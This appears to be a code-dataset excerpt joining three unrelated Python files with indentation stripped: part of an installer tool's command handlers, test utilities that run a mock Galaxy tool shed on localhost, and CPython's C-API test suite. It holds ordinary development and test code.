def __init__(self, initial_vars, command) -> None:
super().__init__(initial_vars)
# noinspection PyUnresolvedReferences
self.read_defaults_file(super().__thisclass__.__name__)
self.curr_progress = 0
self.total_progress = 0
self.progress_staccato_command = False
self.progress_staccato_period = 1
self.progress_staccato_count = 0
def get_default_out_file(self):
pass
def do_command(self):
self.no_numbers_progress = bool(config_vars.get("__NO_NUMBERS_PROGRESS__", "False"))
# if var does not exist default is 0, meaning not to display dynamic progress
self.curr_progress = int(config_vars.get("__START_DYNAMIC_PROGRESS__", "0"))
self.total_progress = int(config_vars.get("__TOTAL_DYNAMIC_PROGRESS__", "0"))
self.progress_staccato_period = int(config_vars["PROGRESS_STACCATO_PERIOD"])
self.progress_staccato_count = 0
do_command_func = getattr(self, "do_" + self.fixed_command)
before_time = time.perf_counter()
do_command_func()
after_time = time.perf_counter()
if bool(config_vars["PRINT_COMMAND_TIME"]):
log.info(f"""{self.the_command} time: {round(after_time - before_time, 4)} sec.""")
def dynamic_progress(self, msg):
if self.total_progress > 0:
self.progress_staccato_count = (self.progress_staccato_count + 1) % self.progress_staccato_period
self.curr_progress += 1
if not self.progress_staccato_command or self.progress_staccato_count == 0:
log.info(f"Progress: {self.curr_progress} of {self.total_progress}; {msg}")
elif self.no_numbers_progress:
log.info(f"Progress: ... of ...; {msg}")
def do_version(self):
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
print(self.get_version_str())
def do_help(self):
import help.helpHelper
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
help_folder_path = config_vars["__INSTL_DATA_FOLDER__"].Path(resolve=True).joinpath("help")
help.helpHelper.do_help(config_vars["__HELP_SUBJECT__"].str(), help_folder_path, self)
def do_parallel_run(self):
processes_list_file = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
ParallelRun(processes_list_file, shell=False)()
def do_wtar(self):
what_to_work_on = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
if not what_to_work_on.exists():
log.error(f"""{what_to_work_on} does not exists""")
return
where_to_put_wtar = config_vars["__MAIN_OUT_FILE__"].Path(resolve=True)
Wtar(what_to_wtar=what_to_work_on, where_to_put_wtar=where_to_put_wtar)()
def do_unwtar(self):
self.no_artifacts = bool(config_vars["__NO_WTAR_ARTIFACTS__"])
what_to_work_on = config_vars.get("__MAIN_INPUT_FILE__", os.curdir).Path()
where_to_unwtar = config_vars.get("__MAIN_OUT_FILE__", None).Path()
Unwtar(what_to_work_on, where_to_unwtar, self.no_artifacts)()
self.dynamic_progress(f"unwtar {utils.original_name_from_wtar_name(what_to_work_on.name)}")
def do_check_checksum(self):
self.progress_staccato_command = True
info_map_file = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
CheckDownloadFolderChecksum(info_map_file, print_report=True, raise_on_bad_checksum=True)()
def do_test_import(self):
import importlib
bad_modules = list()
for module in ("yaml", "appdirs", "configVar", "utils", "svnTree", "aYaml"):
try:
importlib.import_module(module)
except ImportError:
bad_modules.append(module)
if len(bad_modules) > 0:
log.error(f"""missing modules {bad_modules}""")
sys.exit(17)
def do_translate_url(self):
url_to_translate = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
translated_url = connectionBase.connection_factory(config_vars).translate_url(url_to_translate)
print(translated_url)
def do_ls(self):
main_folder_to_list = config_vars["__MAIN_INPUT_FILE__"].Path()
folders_to_list = []
if config_vars.defined("__LIMIT_COMMAND_TO__"):
limit_list = list(config_vars["__LIMIT_COMMAND_TO__"])
for limit in limit_list:
limit = utils.unquoteme(limit)
folders_to_list.append(main_folder_to_list.joinpath(limit))
else:
folders_to_list.append(main_folder_to_list)
ls_format = str(config_vars.get("LS_FORMAT", '*'))
out_file = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
for fold in folders_to_list:
Ls(fold, out_file=out_file, ls_format=ls_format, out_file_append=True)()
def do_fail(self):
sleep_before_fail = int(config_vars.get("__FAIL_SLEEP_TIME__", "0") )
log.error(f"""Sleeping for {sleep_before_fail} seconds""")
time.sleep(sleep_before_fail)
exit_code = int(config_vars.get("__FAIL_EXIT_CODE__", "1") )
log.error(f"""Failing on purpose with exit code {exit_code}""")
sys.exit(exit_code)
def do_checksum(self):
path_to_checksum = os.fspath(config_vars["__MAIN_INPUT_FILE__"])
ignore_files = list(config_vars.get("WTAR_IGNORE_FILES", []))
checksums_dict = utils.get_recursive_checksums(path_to_checksum, ignore=ignore_files)
total_checksum = checksums_dict.pop('total_checksum', "Unknown total checksum")
path_and_checksum_list = [(path, checksum) for path, checksum in sorted(checksums_dict.items())]
width_list, align_list = utils.max_widths(path_and_checksum_list)
col_formats = utils.gen_col_format(width_list, align_list)
for p_and_c in path_and_checksum_list:
print(col_formats[len(p_and_c)].format(*p_and_c))
print()
print(col_formats[2].format("total checksum", total_checksum))
def do_resolve(self):
config_files = config_vars.get("__CONFIG_FILE__", []).list()
input_file = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
output_file = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
config_vars["PRINT_COMMAND_TIME"] = "no" # do not print time report
ResolveConfigVarsInFile(input_file, output_file, config_files=config_files)()
def do_exec(self):
try:
py_file_path = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
config_files = None
if "__CONFIG_FILE__" in config_vars:
config_files = [Path(config_file) for config_file in config_vars["__CONFIG_FILE__"].list()]
for conf_file in config_files:
self.read_yaml_file(conf_file)
with Exec(py_file_path, config_files, reuse_db=False, own_progress_count=0, report_own_progress=False) as exec_le:
exec_le()
except Exception as ex:
log.error(f"""Exception while exec {py_file_path}, {ex}""")
if bool(config_vars.get("EXIT_ON_EXEC_EXCEPTION", False)):
raise
def do_wzip(self):
what_to_work_on = config_vars["__MAIN_INPUT_FILE__"].Path(resolve=True)
if not what_to_work_on.exists():
log.error(f"""{what_to_work_on} does not exists""")
return
where_to_put_wzip = config_vars.get("__MAIN_OUT_FILE__", None).Path(resolve=True)
Wzip(what_to_work_on, where_to_put_wzip)()
def setup_abort_file_monitoring(self):
def start_abort_file_thread(abort_file_path, time_to_sleep, exit_code):
""" Open a thread to wtach the abort file
"""
def abort_file_thread_func(_abort_file_path, _time_to_sleep, _exit_code):
_abort_file_path = Path(_abort_file_path)
while _abort_file_path.is_file():
time.sleep(_time_to_sleep)
log.info(f"aborting because abort file not found {_abort_file_path}")
current_process = psutil.Process()
children = current_process.children(recursive=True)
for child in children:
child.kill()
os._exit(_exit_code) # to kill the main thread see: https://docs.python.org/3.6/library/os.html#os._exit
thread_name = "abort file monitor"
x = threading.Thread(target=abort_file_thread_func, args=(abort_file_path, time_to_sleep, exit_code), daemon=True, name=thread_name)
x.start()
if 'ABORT_FILE' in config_vars:
abort_file_path = config_vars["ABORT_FILE"].Path(resolve=True)
log.info(f"watching abort file {abort_file_path}")
start_abort_file_thread(abort_file_path=abort_file_path, time_to_sleep=1, exit_code=0)
def do_run_process(self):
""" run list of processes as specified in the input file
input file can have two kinds of processes:
1. command line, e.g. ls /etc
2. echo statement, e.g. echo "a message"
each line can also be followed by ">" or ">>" and path to a file, in which case
output from the process or echo will go to that file. ">" will open the file in "w" mode, ">>" in "a" mode.
if --abort-file argument is passed to run-process, the fiel specified will be watch and if and when it does not exist
current running subprocess will be aborted and next processes will not be launched.
"""
self.setup_abort_file_monitoring()
list_of_argv = list()
if "__MAIN_INPUT_FILE__" in config_vars: # read commands from a file
file_with_commands = config_vars["__MAIN_INPUT_FILE__"]
with utils.utf8_open_for_read(file_with_commands, "r") as rfd:
for line in rfd.readlines():
list_of_argv.append(shlex.split(line))
else: # read a command from argv
list_of_argv.append(config_vars["RUN_PROCESS_ARGUMENTS"].list())
RunProcessInfo = namedtuple('RunProcessInfo', ['process_name', 'argv', 'redirect_open_mode', 'redirect_path', 'stderr_means_err'])
list_of_process_to_run_with_redirects = list()
# find redirects
for run_process_info in list_of_argv:
stderr_means_err = True
if "2>&1" in run_process_info:
stderr_means_err = False
run_process_info.remove("2>&1")
if len(run_process_info) >= 3 and run_process_info[-2] in (">", ">>"):
list_of_process_to_run_with_redirects.append(RunProcessInfo(process_name=run_process_info[0].strip(),
argv=run_process_info[1:-2],
redirect_open_mode={">": "w", ">>": "a"}[run_process_info[-2]],
redirect_path=run_process_info[-1],
stderr_means_err=stderr_means_err))
else:
list_of_process_to_run_with_redirects.append(RunProcessInfo(process_name=run_process_info[0].strip(),
argv=run_process_info[1:],
redirect_open_mode=None,
redirect_path=None,
stderr_means_err=stderr_means_err))
for run_process_info in list_of_process_to_run_with_redirects:
redirect_file = None
if run_process_info.redirect_path:
redirect_file = open(run_process_info.redirect_path, run_process_info.redirect_open_mode)
print(run_process_info)
if run_process_info.process_name.lower() == "echo":
str_to_echo = " ".join(run_process_info.argv)
if redirect_file:
redirect_file.write(f"{str_to_echo}\n")
else:
sys.stdout.write(f"{str_to_echo}\n")
else:
log.info(f"Start running {run_process_info.process_name} with argv {run_process_info.argv}")
with Subprocess(run_process_info.process_name,
*run_process_info.argv,
out_file=redirect_file,
stderr_means_err=run_process_info.stderr_means_err,
own_progress_count=0) as sub_proc:
sub_proc()
log.info(f"Done running {run_process_info.process_name} with argv {run_process_info.argv}")
if redirect_file:
redirect_file.close()
|
shed_app_test_utils.py
|
from collections import namedtuple
import contextlib
import shutil
import socket
from time import time as now
from tempfile import mkdtemp
import threading
from requests import post
from werkzeug.serving import run_simple
from .shed_app import (
app,
InMemoryShedDataModel,
)
from galaxy.util.sockets import unused_port
DEFAULT_OP_TIMEOUT = 2
def mock_model(directory):
return InMemoryShedDataModel(
directory
).add_category(
"c1", "Text Manipulation"
).add_category(
"c2", "Sequence Analysis"
).add_category(
"c3", "Tool Dependency Packages"
)
def setup_mock_shed():
port = unused_port()
directory = mkdtemp()
model = mock_model(directory)
def run():
app.debug = True
app.config["model"] = model
run_simple(
'localhost',
port,
app,
use_reloader=False,
use_debugger=True
)
t = threading.Thread(target=run)
t.start()
wait_net_service("localhost", port, DEFAULT_OP_TIMEOUT)
return MockShed("http://localhost:%d" % port, directory, t, model)
# code.activestate.com/recipes/576655-wait-for-network-service-to-appear
def wait_net_service(server, port, timeout=None):
""" Wait for network service to appear
@param timeout: in seconds, if None or 0 wait forever
@return: True of False, if timeout is None may return only True or
throw unhandled network exception
"""
s = socket.socket()
# The following line prevents this method from interfering with the
# process it is waiting for on localhost.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout:
end = now() + timeout
while True:
try:
if timeout:
next_timeout = end - now()
if next_timeout < 0:
return False
else:
s.settimeout(next_timeout)
s.connect((server, port))
except socket.timeout:
# this exception occurs only if timeout is set
if timeout:
return False
except socket.error:
pass
else:
s.close()
return True
@contextlib.contextmanager
def mock_shed():
mock_shed_obj = None
try:
mock_shed_obj = setup_mock_shed()
yield mock_shed_obj
finally:
if mock_shed_obj is not None:
mock_shed_obj.shutdown()
def _shutdown(self):
post("%s/shutdown" % self.url)
self.thread.join(DEFAULT_OP_TIMEOUT)
shutil.rmtree(self.directory)
MockShed = namedtuple("MockShed", ["url", "directory", "thread", "model"])
MockShed.shutdown = _shutdown
__all__ = ["setup_mock_shed", "mock_shed"]
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exception(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
orig_sys_exception = sys.exception()
orig_exception = _testcapi.set_exception(new_exc)
new_sys_exception = sys.exception()
new_exception = _testcapi.set_exception(orig_exception)
reset_sys_exception = sys.exception()
self.assertEqual(orig_exception, e)
self.assertEqual(orig_exception, raised_exception)
self.assertEqual(orig_sys_exception, orig_exception)
self.assertEqual(reset_sys_exception, orig_exception)
self.assertEqual(new_exception, new_exc)
self.assertEqual(new_sys_exception, new_exception)
else:
self.fail("Exception not raised")
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.fail("Exception not raised")
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then call
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-2)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, B.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
if Py_DEBUG:
# gh-89373: In debug mode, _Py_Dealloc() keeps a strong reference
# to the type while calling tp_dealloc()
self.assertEqual(type_refcnt, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
else:
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
